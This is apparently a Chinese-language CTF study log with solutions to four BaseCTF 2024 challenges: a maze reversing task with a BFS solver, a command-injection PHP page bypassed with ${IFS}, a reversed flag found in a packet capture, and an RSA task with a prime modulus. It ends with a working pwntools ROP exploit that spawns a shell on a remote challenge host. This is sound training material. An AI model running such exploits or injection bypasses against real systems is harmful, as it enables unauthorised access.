1.18学习记录
re
basectf2024 ez_maze
先查壳：没有壳，是 64 位文件，用 IDA 打开看看。
找到 main 函数，按 F5 查看伪 C 代码：
/*
 * Decompiled entry point of the BaseCTF 2024 "ez_maze" binary (IDA output,
 * reformatted). Reads up to 34 move characters and walks a flat, row-major
 * maze stored at asc_403020: 'w'/'a'/'s'/'d' change the cursor index by
 * -15/-1/+15/+1 (so the maze is 15 columns wide), '$' (36) is a wall and
 * 'y' (121) is the goal. Any other character aborts with "Invalid input".
 * Returns 0 on "you win" or when the input runs out, -1 on any rejection.
 */
int __fastcall main(int argc, const char **argv, const char **envp)
{
    char v5[32]; // [rsp+20h] [rbp-60h] BYREF
    __int16 v6; // [rsp+40h] [rbp-40h]
    char v7; // [rsp+42h] [rbp-3Eh]
    int pos; // current index into the 15-wide maze
    int i;

    sub_401840(argc, argv, envp);
    j_puts(Buffer);
    j_puts(aTakeTheShortes);
    j_puts(aShowYourTime);
    memset(v5, 0, sizeof(v5));
    v6 = 0;
    v7 = 0;
    /* "%34s" stores 34 bytes + NUL = 35 bytes: v5 (32) + v6 (2) + v7 (1).
       The three "locals" are really one contiguous input buffer, which is
       why the solution path may be at most 34 moves long. */
    j_scanf("%34s", v5);

    pos = 0;
    for (i = 0; v5[i]; ++i) {
        switch ((unsigned __int8)v5[i]) {
        case 'w': /* 119: up one row */
            if (pos <= 14)
                goto out_of_bounds;
            pos -= 15;
            break;
        case 'a': /* 97: left one column */
            if (pos % 15 == 0)
                goto out_of_bounds;
            --pos;
            break;
        case 's': /* 115: down one row */
            if (pos > 209)
                goto out_of_bounds;
            pos += 15;
            break;
        case 'd': /* 100: right one column */
            if (pos % 15 == 14)
                goto out_of_bounds;
            ++pos;
            break;
        default:
            j_puts(aInvalidInput);
            return -1;
        }

        if (asc_403020[pos] == '$') { /* 36: hit a wall */
            j_puts(aInvalidMoveHit);
            return -1;
        }
        if (asc_403020[pos] == 'y') { /* 121: reached the goal */
            j_puts(aYouWin);
            j_puts(aPlzBasectfLowe);
            return 0;
        }
    }
    j_puts(aYouDidnTReachT);
    return 0;

out_of_bounds:
    j_puts(aInvalidMoveOut);
    return -1;
}
首先，从 `asc_403020[v9]` 这种按下标访问全局数组的写法，结合题目名 maze，可以推断这是一个迷宫题。再看 v3 的赋值：v3 取的是输入的每个字符，后面与 100、115、119、97 比较，查 ASCII 码表正好是 d、s、w、a，也就是根据按键执行移动。代码里还能看出：走到 36（'$'）就是撞墙，走到 121（'y'）就通关，所以终点是 y；起点 x 要到数据区（View → Hex）里看迷宫本身才能确定。接下来分析迷宫大小：按 s 时下标 +15、按 w 时 −15，说明迷宫按行连续存放、每行宽 15 格（a/d 分别 −1/+1，并用 v9 % 15 判断是否在行首/行尾）。另外 `scanf("%34s")` 只读 34 个字符，所以路线不能超过 34 步。题目要求是找最短路径再取 MD5，迷宫数据在 View Hex 里按 15 列对齐看形状，用 Shift+E 提取出来，手动从 x 走到 y 即可；我不太会写 DFS，手搓出来的路线是 sssssssddddwwwddsssssssdddsssddddd（正好 34 步），对它取 MD5 就是 flag。
下面是大佬写的 BFS 求解脚本（求的是最短路径，不是解密）：
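from collections import deque

# 15x15 maze dumped from the binary, stored row-major exactly like
# asc_403020 in the decompilation: 1 = wall ('$'), 0 = open cell,
# 8 = start ('x'), 9 = goal ('y').
maze = [
    8, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1, 1,
    0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1, 1, 1, 1, 1,
    0, 1, 0, 1, 1, 0, 1, 1, 0, 0, 0, 0, 0, 1, 1,
    0, 1, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1, 0, 1, 1,
    0, 1, 1, 1, 0, 0, 0, 1, 1, 1, 1, 1, 0, 1, 1,
    0, 1, 1, 1, 0, 1, 0, 0, 1, 0, 1, 1, 1, 1, 1,
    0, 1, 1, 1, 0, 1, 0, 1, 1, 0, 0, 0, 1, 1, 1,
    0, 0, 0, 0, 0, 1, 0, 0, 0, 0, 1, 0, 1, 1, 1,
    1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 1, 1, 1,
    1, 1, 1, 1, 1, 1, 0, 1, 1, 1, 1, 1, 1, 1, 1,
    1, 1, 1, 0, 0, 0, 0, 1, 1, 0, 0, 0, 1, 1, 1,
    1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 1, 1, 1, 1, 1,
    1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 1, 0, 1, 1,
    1, 1, 1, 1, 1, 1, 1, 1, 1, 0, 1, 0, 1, 1, 1,
    1, 1, 1, 1, 1, 1, 0, 0, 0, 0, 0, 0, 0, 0, 9
]


def BFS(maze, x, y, width=15):
    """Shortest w/a/s/d move string from cell (x, y) to the cell holding 9.

    x is the row and y the column of a flat, row-major `maze` list whose
    rows are `width` cells long (15 for this challenge; the binary moves
    the cursor by +/-15 for s/w). Cells equal to 1 are walls. Neighbours
    are expanded in the order s, a, d, w, which decides which of several
    equally short paths is returned. Returns None if the goal is
    unreachable (the original fell off the end and returned None too).
    """
    height = len(maze) // width
    # visited is local so repeated calls do not share (and corrupt) state
    visited = [False] * (height * width)
    # deque gives O(1) pops; list.pop(0) was O(n) per step
    queue = deque([(x, y, '')])
    while queue:
        x, y, path = queue.popleft()
        # explicit range check: negative indices would silently wrap in Python
        if not (0 <= x < height and 0 <= y < width):
            continue
        idx = x * width + y
        if visited[idx] or maze[idx] == 1:
            continue
        visited[idx] = True
        if maze[idx] == 9:
            return path
        queue.append((x + 1, y, path + 's'))
        queue.append((x, y - 1, path + 'a'))
        queue.append((x, y + 1, path + 'd'))
        queue.append((x - 1, y, path + 'w'))
    return None


flag = BFS(maze, 0, 0)
print(flag)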
脚本跑出来也是这个结果
最后解得:basectf{131b7d6e60e8a34cb01801ae8de07efe}
web
basectf2024 RCEisamazingwithspace
这题是一个简单的代码审计：通过 POST 传参，绕过对空格的过滤来执行命令。
<?php
// BaseCTF 2024 "RCEisamazingwithspace" challenge source, as served.
highlight_file(__FILE__);
$cmd = $_POST['cmd'];

// The only filter: reject the command if it contains any whitespace
// (\s matches space, tab, newline, ...).
// NOTE(review): this blocks the separator, not the command -- a shell still
// accepts whitespace-free forms such as ${IFS} or brace expansion
// ({ls,-l}), which is the intended bypass.
if (preg_match('/\s/', $cmd) === 1) {
    echo 'Space not allowed in command';
    exit;
}

// Unfiltered user input reaches system(): command injection by design.
system($cmd);
用 POST 传 cmd 参数即可。过滤的是 `\s`（空格、Tab、换行等），所以命令要写成不含空白的形式，例如用 `${IFS}` 代替空格。
misc
basectf2024 海上遇到了鲨鱼
题目附件是一个流量包，属于流量分析题，先用 Wireshark 追踪流。
在 TCP 流里没找到 flag，在 HTTP 追踪流里发现了一串倒序的 flag，用脚本反转回来：
# The flag found in the HTTP stream is stored mirrored; flip it back.
s = "}67bf613763ca-50b3-4437-7a3a-b683fe51{FTCesaB"  # the mirrored string
reseved_s = "".join(reversed(s))  # equivalent to s[::-1]
print(reseved_s)
得flag BaseCTF{15ef386b-a3a7-7344-3b05-ac367316fb76}
crypto
basectf2024 babyrsa
RSA 加解密。注意题目里 n 直接由 getPrime(1024) 生成，是一个素数而不是两个素数之积，所以 φ(n) = n − 1，不需要分解就能算出 d。
from Crypto.Util.number import *
# Challenge source for BaseCTF 2024 "babyrsa" (flag body redacted by the author).
flag = b'BaseCTF{}'
m = bytes_to_long(flag)
# NOTE: n is a single 1024-bit prime rather than p*q, so phi(n) = n - 1 and
# the private exponent follows directly from the published values.
n = getPrime(1024)
e = 65537
c = pow(m, e, n)
for name, value in (("n", n), ("e", e), ("c", c)):
    print(name, "=", value)
"""
n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832
"""
exp:
from Crypto.Util.number import *
import gmpy2
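n = 104183228088542215832586853960545770129432455017084922666863784677429101830081296092160577385504119992684465370064078111180392569428724567004127219404823572026223436862745730173139986492602477713885542326870467400963852118869315846751389455454901156056052615838896369328997848311481063843872424140860836988323
e = 65537
c = 82196463059676486575535008370915456813185183463924294571176174789532397479953946434034716719910791511862636560490018194366403813871056990901867869218620209108897605739690399997114809024111921392073218916312505618204406951839504667533298180440796183056408632017397568390899568498216649685642586091862054119832

# The challenge built n with a single getPrime(1024) call, so n itself is
# prime and the group order is phi(n) = n - 1, not (p-1)(q-1). Check that
# assumption before relying on it: a base-2 Fermat test exposes a composite
# n, for which n - 1 would be the wrong modulus and m would be garbage.
assert pow(2, n - 1, n) == 1, "n is not prime; phi(n) = n - 1 does not hold"
phin = n - 1
# modular inverse via built-in pow (Python 3.8+); no gmpy2 dependency needed
d = pow(e, -1, phin)
m = pow(c, d, n)
# minimal-length big-endian bytes, the same output as Crypto's long_to_bytes(m)
print(m.to_bytes((m.bit_length() + 7) // 8, 'big'))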
pwn
basectf2024 我把她丢了
查壳后放到 IDA 里看一下。
找到 main 函数，发现 read 处存在栈溢出。因为是 64 位文件，参数通过寄存器传递（第一个参数在 rdi），所以要找 `pop rdi; ret` 这样的 gadget，再找一下 /bin/sh 字符串的地址和 system 的 plt；payload 里多加一个 ret 一般是为了在调用 system 前把栈对齐。exp：
from pwn import *
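# Target the remote service by default; run as `python3 exp.py LOCAL`
# (pwntools `args`) to debug against ./pwn instead. The original assigned
# process() and then remote() to the same name, which spawned a local
# process that was never used or closed.
io = process('./pwn') if args.LOCAL else remote("gz.imxbt.cn", 20389)
elf = ELF('./pwn')

# ROP chain for a 64-bit binary: system()'s first argument travels in rdi,
# so a `pop rdi; ret` gadget loads the "/bin/sh" pointer before the call.
# Addresses are from this challenge binary -- re-check with ROPgadget /
# IDA if the binary differs.
pop_rdi = 0x401196   # pop rdi; ret
binsh = 0x402008     # "/bin/sh" string in the binary
ret = 0x40101a       # lone `ret`; presumably keeps rsp 16-byte aligned for system()
shell = elf.plt['system']

# 0x70 bytes of local buffer plus 8 bytes of saved rbp sit before the
# return address, so the chain starts at offset 0x78.
payload = b'a' * (0x70 + 8) + p64(pop_rdi) + p64(binsh) + p64(ret) + p64(shell)
io.recv()
io.sendline(payload)
io.interactive()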